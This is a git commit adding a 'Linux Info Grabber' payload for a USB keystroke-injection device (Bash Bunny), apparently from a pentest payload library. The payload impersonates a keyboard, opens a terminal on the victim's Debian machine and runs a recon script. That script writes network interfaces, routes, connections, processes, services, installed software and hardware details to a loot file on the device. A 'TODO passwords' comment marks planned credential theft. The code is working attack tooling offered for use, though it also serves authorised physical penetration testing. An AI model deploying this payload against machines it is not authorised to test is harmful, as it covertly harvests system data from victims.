Added "Info Grabber for Linux" payload (#299)
Thorsten Sick
Sebastian Kinne
parent
08c24c4389
commit
fae8746466
|
|
@ -0,0 +1,33 @@
|
|||
# Linux Info Grabber
|
||||
|
||||
Author: Thorsten Sick
|
||||
|
||||
Version: 0.9
|
||||
|
||||
OS: Linux (Debian based)
|
||||
|
||||
Attackmode: HID STORAGE
|
||||
|
||||
Description: System info grabber for Linux (focus: Debian)
|
||||
|
||||
Category: Recon
|
||||
|
||||
Creds: Simen Kjeserud for Inspiration (Info_Grabber)
|
||||
|
||||
executes recon.sh to extract sytem info
|
||||
|
||||
|
||||
## Description
|
||||
|
||||
Extract system information. Uses debian apt to list installed applications.
|
||||
|
||||
System info will be stored in loot dir
|
||||
|
||||
|
||||
## Status
|
||||
|
||||
|LED|Status|
|
||||
|-|-|
|
||||
|SETUP (Magenta solid)|Not much setup needed|
|
||||
|ATTACK (Yellow single blink)|attack|
|
||||
|FINISH (Green 1000ms VERYFAST blink followed by SOLID)|Done|
|
||||
|
|
@ -0,0 +1,40 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Linux_Info_Grabber
|
||||
# Description: System info grabber for Linux (focus: Debian)
|
||||
# Original Author: Thorsten Sick
|
||||
# Version: 0.9
|
||||
# Category: Recon
|
||||
# Target: Linux (Debian based)
|
||||
# Creds: Simen Kjeserud for Inspiration (Info_Grabber)
|
||||
# Attackmodes: HID, STORAGE
|
||||
#
|
||||
#
|
||||
# executes recon.sh to extract sytem info
|
||||
#
|
||||
# Does NOT hide any traces
|
||||
# Is also noisy: Does more in victim shell than it has to
|
||||
|
||||
#init
|
||||
LED SETUP
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
|
||||
# attack
|
||||
LED ATTACK
|
||||
RUN UNITY xterm
|
||||
Q DELAY 1000
|
||||
Q STRING export lootdir=/media/\$USER/BashBunny/loot/InfoGrabber
|
||||
Q ENTER
|
||||
Q STRING export lootfile=\$lootdir/loot.txt
|
||||
Q ENTER
|
||||
Q STRING mkdir -p \$lootdir
|
||||
Q ENTER
|
||||
Q STRING export exepos=/media/\$USER/BashBunny/payloads/$SWITCH_POSITION
|
||||
Q ENTER
|
||||
Q STRING bash \$exepos/recon.sh \$lootfile
|
||||
Q ENTER
|
||||
|
||||
# finish
|
||||
|
||||
LED FINISH
|
||||
|
|
@ -0,0 +1,71 @@
|
|||
#!/usr/bin/env bash
|
||||
|
||||
# Data collection script
|
||||
# Similar to InfoGrabber for Windows
|
||||
|
||||
# First parameter is path of log file to create
|
||||
|
||||
|
||||
echo "Linux system info grabber" > $@
|
||||
echo "" >> $@
|
||||
|
||||
echo "Interfaces" >> $@
|
||||
echo "##############" >> $@
|
||||
ifconfig -a >> $@
|
||||
echo "" >> $@
|
||||
|
||||
|
||||
echo "Mounted FS" >> $@
|
||||
echo "##############" >> $@
|
||||
findmnt -A >> $@
|
||||
echo "" >> $@
|
||||
|
||||
# TODO wifi
|
||||
# TODO local user
|
||||
echo "Processes" >> $@
|
||||
echo "##############" >> $@
|
||||
ps -ax >> $@
|
||||
echo "" >> $@
|
||||
|
||||
echo "Interfaces (netstat)" >> $@
|
||||
echo "##############" >> $@
|
||||
netstat --interfaces >> $@
|
||||
echo "" >> $@
|
||||
|
||||
echo "Routes" >> $@
|
||||
echo "##############" >> $@
|
||||
netstat --route >> $@
|
||||
echo "" >> $@
|
||||
|
||||
# This one slow, uncomment if needed
|
||||
echo "Netstat" >> $@
|
||||
echo "##############" >> $@
|
||||
netstat >> $@
|
||||
echo "" >> $@
|
||||
|
||||
echo "Services" >> $@
|
||||
echo "##############" >> $@
|
||||
service --status-all >> $@
|
||||
echo "" >> $@
|
||||
|
||||
echo "Installed software" >> $@
|
||||
echo "##############" >> $@
|
||||
apt list --installed >> $@
|
||||
echo "" >> $@
|
||||
|
||||
echo "Loaded drivers" >> $@
|
||||
echo "##############" >> $@
|
||||
lsmod >> $@
|
||||
echo "" >> $@
|
||||
|
||||
echo "PCI Hardware" >> $@
|
||||
echo "##############" >> $@
|
||||
lspci -vv >> $@
|
||||
echo "" >> $@
|
||||
|
||||
echo "USB hardware" >> $@
|
||||
echo "##############" >> $@
|
||||
lsusb -v >> $@
|
||||
echo "" >> $@
|
||||
|
||||
# TODO passwords
|
||||
Loading…
Reference in New Issue